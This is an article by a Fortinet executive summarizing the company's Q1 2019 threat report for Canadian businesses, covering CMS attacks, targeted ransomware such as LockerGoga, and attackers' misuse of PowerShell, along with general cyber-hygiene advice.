New global threat report underscores importance of refreshing cyber hygiene
By Derek Manky
By Derek Manky
Earlier this year, the Canadian Centre for Cyber Security predicted that 2019 would offer little respite when it came to cyber threats.
Unfortunately, the centre has yet to be proven wrong. That report answered the question of “what” when it comes to security trends, including theft of personal information, malicious online influence activity and even potential damage to infrastructure.
Now, as we approach the halfway mark of the year, we’re beginning to get a clearer picture of the “how.”
This month Fortinet released its latest quarterly global Threat Landscape Report, which takes stock of billions of live threat events, collected from millions of devices throughout the first quarter of 2019, and analyzed by our FortiGuard Labs team. At its core, the report is meant to answer the simple question of, “is it getting better or worse out there?” While the answer is complicated, the bottom line is this: while the global threat landscape has eased slightly since hitting a peak in December 2018, it remains higher than when the Threat Landscape Index (TLI) report series was first launched, and also shows somewhat more volatility.
Given the sheer amount of activity collected each quarter, identifying the most critical trends is no small challenge. After careful analysis, we believe the following risk factors are among those that Canadian businesses should have high on their radar.
Keep a close eye on content management
The popularity of social media continues to play a critical role in the lives of individuals. From a security perspective, personally identifiable information collected from social media sites is often used by cybercriminals for phishing and spearphishing attacks. However, as organizations race to create social-savvy websites that enable them to compete more effectively in the social media and larger digital marketplace, they are leveraging content management systems (CMS) and related development frameworks that are also vulnerable.
Like any technology on the upswing, these sites are attracting the attention of cybercriminals in search of opportunity. While WordPress continues to be targeted, attacks have begun to move to lesser-known CMS systems. Attacks can range from simply vandalizing a website and impacting a company’s brand and reputation; to executing a DDoS attack; to stealing or compromising mailing lists, forums, media galleries, and online stores and shopping carts; to using a compromised website as a launching pad to attack internal network resources or infect visitors to the site.
The takeaway for Canadian businesses is clear. As the popularity of CMS sites grows, so too do their risks. Don’t let minor CMS or third-party plugins end up being the weak spot in your defenses.
Ransomware is far from gone
Ransomware has become a regular feature of the threat landscape. It’s also evolving, and the TLI shows a clear trend toward threat actors using it for more targeted, and potentially lucrative, campaigns.
Multiple attacks during Q1 demonstrate that ransomware is increasingly being customized for high-value targets, often to provide the attacker with privileged access to the network, thereby increasing the impact of an infection. LockerGoga is an example of a recent attack conducted in multiple stages, the first being a thorough reconnaissance of the defenses in place at the sites it targeted. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed. This not only confirms the targeted nature of the attack, but also that attackers were able to predetermine that obfuscation and evasion techniques were unnecessary as the malware would not be easily detected by existing defenses.
LockerGoga is hardly the only ransomware variant that was active in Q1. It’s critical that businesses take steps to protect against ransomware by ensuring consistent patching and backup priorities are maintained, including storing backups off-network and regularly testing them for malware. Companies should also begin to consider strategies for addressing tailored and targeted ransomware threats before they strike.
Attackers are comfortable “living off the land”
Security risks are often associated with unauthorized downloads of malware or other tools from outside the network that then drive an attack. However, the report has found that attackers are increasingly using tools already pre-installed on targeted systems to carry out their activities. This is known as “living off the land,” and enables hackers to hide their attacks behind what appears to be normal, everyday processes, making them more challenging to identify. And because many of these tools include privileged access, they can also be harder to stop.
PowerShell is arguably one of the most popular tools used by IT teams for many reasons. It comes pre-installed on Windows machines and can interact directly with the .NET Framework. It has also become quite popular among cybercriminals. We’ve tracked adversaries using PowerShell in campaigns to deploy numerous malware, including TrickBot and Emotet banking Trojans. PowerShell, of course, is not the only one. There are other popular utilities that enable attackers to escalate privileges, move laterally across an environment, and install malicious payloads on other systems.
What you can do
Those of us tasked with defending networks also know that the threat landscape is always shifting. Which is why one of the most important things any IT team can do is remain aware of the latest cyberthreat trends and targets. The report not only identified the threats listed above, but it also documents many other threat trends as well. And because cyberattacks tend to occur in clusters, it is critical that resources be directed at addressing those systems and functions currently being targeted by cybercriminals.
The second is to reprioritize basic cyber hygiene practices. Zero day attacks are rare because they are difficult to develop. Attackers often target known vulnerabilities, which means that a lot of attacks exploit vulnerabilities for which a patch was readily available. That requires identifying all assets on your network, patching those with vulnerabilities, replacing those that can no longer be updated and segmenting those, like IoT devices, that can’t be easily patched.
Finally, organizations need to step back and rethink their security—especially if they have been engaged in digital transformation efforts. The first step is to identify and then engineer out as many points of weakness as possible. This includes a proactive inventory of devices, granular access control and dynamic network segmentation. Next, develop a proactive and integrated security approach that provides consistent protection across your entire distributed environment. In this way, you can better defend you entire network environment—from IoT devices and the mobile edge, the network core, the new WAN edge and out to multi-cloud environments—at speed and scale.
As we saw at the start of the year, the threats are not likely to abate. Embracing an effective, long-term strategy that seeks to address security in an integrated and collaborative fashion is the most important step organizations can take to keeping adversaries at bay.
Derek Manky is chief, Security Insights & Global Threat Alliances at Fortinet, Office of CISO